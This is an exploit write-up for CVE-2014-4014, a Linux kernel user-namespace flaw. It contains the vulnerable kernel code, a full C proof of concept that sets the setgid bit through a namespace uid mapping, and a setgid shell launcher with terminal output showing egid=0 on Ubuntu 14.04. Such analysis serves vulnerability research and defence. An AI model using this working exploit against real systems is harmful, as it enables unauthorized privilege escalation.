CVE-2014-4014: Linux Kernel Local Privilege Escalation "exploitation"

Introduction

The CLONE_NEWUSER namespace was introduced in Linux 2.6.23 and completed in Linux 3.8 (and starting from 3.8, unprivileged processes can create user namespaces). It is used to isolate the user and group ID number spaces, i.e., a process's user and group IDs can be different inside and outside a user namespace. For example, a normal (unprivileged) process can create a namespace in which it has a uid of 0.

Hence, a mapping from the user and group IDs inside a user namespace to a corresponding set of user and group IDs outside the namespace is required. This mapping allows the OS to perform the appropriate permission checks when a process in a user namespace performs operations that affect the system outside that namespace, e.g., file system access. However, a number of Linux filesystems are not yet "fully" user-namespace aware.

The bug is in incorrect use of the inode_capable() that determines capabilities of the user or group. Let's take a look at the inode_change_ok() function that uses inode_capable()to check that the caller has sufficient privileges to perform chown, chgrp and chmod operations:

int inode_change_ok(const struct inode *inode, struct iattr *attr)
{
	....

        /* If force is set do it anyway. */
        if (ia_valid & ATTR_FORCE)
                return 0;

        /* Make sure a caller can chown. */
        if ((ia_valid & ATTR_UID) &&
            (!uid_eq(current_fsuid(), inode->i_uid) ||
             !uid_eq(attr->ia_uid, inode->i_uid)) &&
            !inode_capable(inode, CAP_CHOWN))
                return -EPERM;

        /* Make sure caller can chgrp. */
	....

        /* Make sure a caller can chmod. */
        if (ia_valid & ATTR_MODE) {
                if (!inode_owner_or_capable(inode))                          (1)
                        return -EPERM;
                /* Also check the setgid bit! */
                if (!in_group_p((ia_valid & ATTR_GID) ? attr->ia_gid :
                                inode->i_gid) &&
                    !inode_capable(inode, CAP_FSETID))                       (2)
                        attr->ia_mode &= ~S_ISGID;
        }

At (2), the inode_capable() is called with CAP_FSETID. The inode_capable() is then supposed to check whether the caller is allowed to perform the chmod operation based on the mapping to uid and gid outside the namespace:

bool inode_capable(const struct inode *inode, int cap)
{
        struct user_namespace *ns = current_user_ns();

        return ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);    (3)
}

However, as can be seen at (3), the check is only performed for inode->i_uid (and not for inode->i_gid). What that means is that if we own a file as a non-privileged user (outside the namespace) with gid set to 0 (how can that happen?), we can set the setgid bit on that file due to the missing inode->i_guid check above. But yes, we do need to own (i.e., our uid) the file in the first place because of the inode_owner_or_capable() check at (1):

bool inode_owner_or_capable(const struct inode *inode)
{
        if (uid_eq(current_fsuid(), inode->i_uid))
                return true;
        if (inode_capable(inode, CAP_FOWNER))
                return true;
        return false;
}

The following PoC demonstrates the exploitation technique.

PoC

For this example, I'll be using Ubuntu 14.04:

vnik$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64

First, let's assume there is a file owned by us (vnik) with gid of 0:

vnik$ id
uid=1001(vnik) gid=1001(vnik) groups=1001(vnik)

vnik$ ls -al test 
-rw-rw-r-- 1 vnik root 0 Jun 19 13:59 test

So, the gid is root and there are no setuid or setgid bits set. Let's create a user namespace where our user is mapped to root.

#define _GNU_SOURCE
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;

    // close stdout
    close(f_args->pipe_fd[1]); 

    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);          (5)

    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);

    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);     (3)
    assert(pid != -1);

    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 

    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);

    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));                     (4)
    close(f_args.pipe_fd[1]);

    assert (waitpid(pid, NULL, 0) != -1);
}

The above code creates a user namespace (3) with a mapping (4) for the current user (outside the namespace) to uid 0 (inside the namespace). The child process within the new namespace then sets the setgid bit (5) on the supplied file. Since there is no check for kgid_has_mapping(ns, inode->i_gid) in inode_capable(), we can set the setgid bit on a file with an arbitrary gid value (even if we don't belong to that group outside the namespace). The above PoC can be downloaded from here.

vnik$ gcc poc.c -o poc

Let's now create a simple shell launcher that we'll use to overwrite the test file:

vnik$ cat << EOF > shell.c
int main() {
    setgid(0);
    execl("/bin/bash", "-sh", 0);
}
EOF

vnik$ gcc shell.c -o shell
vnik$ cp shell test && ls -al ./test
-rw-r--r-- 1 vnik root  8564 Jun 20 13:20 test

Now that we've replaced the test file with our shell (preserving the gid), let's set the setgid bit:

vnik$ ./poc ./test
vnik$ ls -al ./test
-rwxr-s--- 1 vnik root  8564 Jun 20 13:20 test
vnik$ ./test
-sh-4.3$ id  
uid=1000(vnik) gid=1000(vnik) egid=0(root) groups=1000(vnik)

We have egid = 0. Whoopty doo! Yes, we can now read and write files (that were previously only readable or writable by gid = 0) but that does not directly lead to root.

Conclusion

The vulnerable kernel versions do not properly use the inode_capable() in determining the user capabilities. A non-privileged user "may" be able to escalate privileges to root. However, good luck finding a file owned by your user with gid = 0 (or whatever gid you're targeting). Once you get egid = 0, what's next? Can we escalate this to root in a generic or distribution-specific way?